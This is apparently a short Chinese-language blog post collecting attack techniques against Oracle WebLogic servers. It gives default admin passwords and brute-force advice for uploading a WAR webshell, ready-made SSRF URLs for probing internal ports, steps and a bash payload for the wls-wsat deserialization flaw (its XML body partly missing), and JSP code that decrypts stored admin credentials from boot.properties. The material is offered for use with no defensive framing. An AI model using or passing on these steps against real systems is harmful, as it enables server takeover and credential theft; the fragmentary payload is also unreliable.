針對weblogic測試的一些小總結

針對weblogic測試的一些小總結

1.管理員登錄頁面弱密碼

Weblogic的埠一般為7001，弱密碼一般為weblogic/Oracle@123 or weblogic，或者根據具體情況進行猜測，公司名，人名等等，再有就可以用burpsuite的intruder進行暴力破解，一旦成功就可以上傳war包getshell。

2.weblogic ssrf

Oracle WebLogic web server即可以被外部主機訪問，同時也允許訪問內部主機。如果存在此url http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp 都會存在ssrf

下面我們監聽一下192.168.1.59:139的139埠（開啟）跟138埠（未開啟）的返回，埠的開啟情況，

http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:139&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

http://192.168.8.128:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.59:138&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

3 .weblogic反序列化

Wenlogic反序列化的漏洞已經被爆出很長時間，網上可以找出各種各樣的工具，在這裡我就不在多提了。

4.weblogic_uac

第一步 抓取http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 對其發起POST請求(任意包都可以，只要url對就可以)

第二步 加入Content-Type:text/xml

第三步 在body中放入payload

servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp

]]>

以上為默認路徑，如果不是默認路徑同時又是linux系統可用以下payload爆出路徑

/bin/bash

-c

find $DOMAIN_HOME -type d -name bea_wls_internal|while read f;do find $f -type d -name war;done|while read ff;do echo $ff >$ff/a.txt;done

5.weblogic 在線與離線解密

如有webshell可進行在線解密

把一下代碼放入伺服器進行訪問，紅色字體weblogic的加密密碼，可在boot.properties文件中找到。路徑為../../../Server/security/boot.properties

EncryptionService es = null;

ClearOrEncryptedService ces = null;

String s = null;

s="wfFNcH6k+9Nz22r1gCMnylgUr9Ho5kz8nDgib/TuOZU=";

es = SerializedSystemIni.getEncryptionService();

if (es == null) {

out.println("Unable to initialize encryption service");

return;

}

ces = new ClearOrEncryptedService(es);

if (s != null) {

out.println("
Decrypted Password is:" + ces.decrypt(s));

}

離線解密需要兩個文件SerializedSystemIni.dat跟boot.properties

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！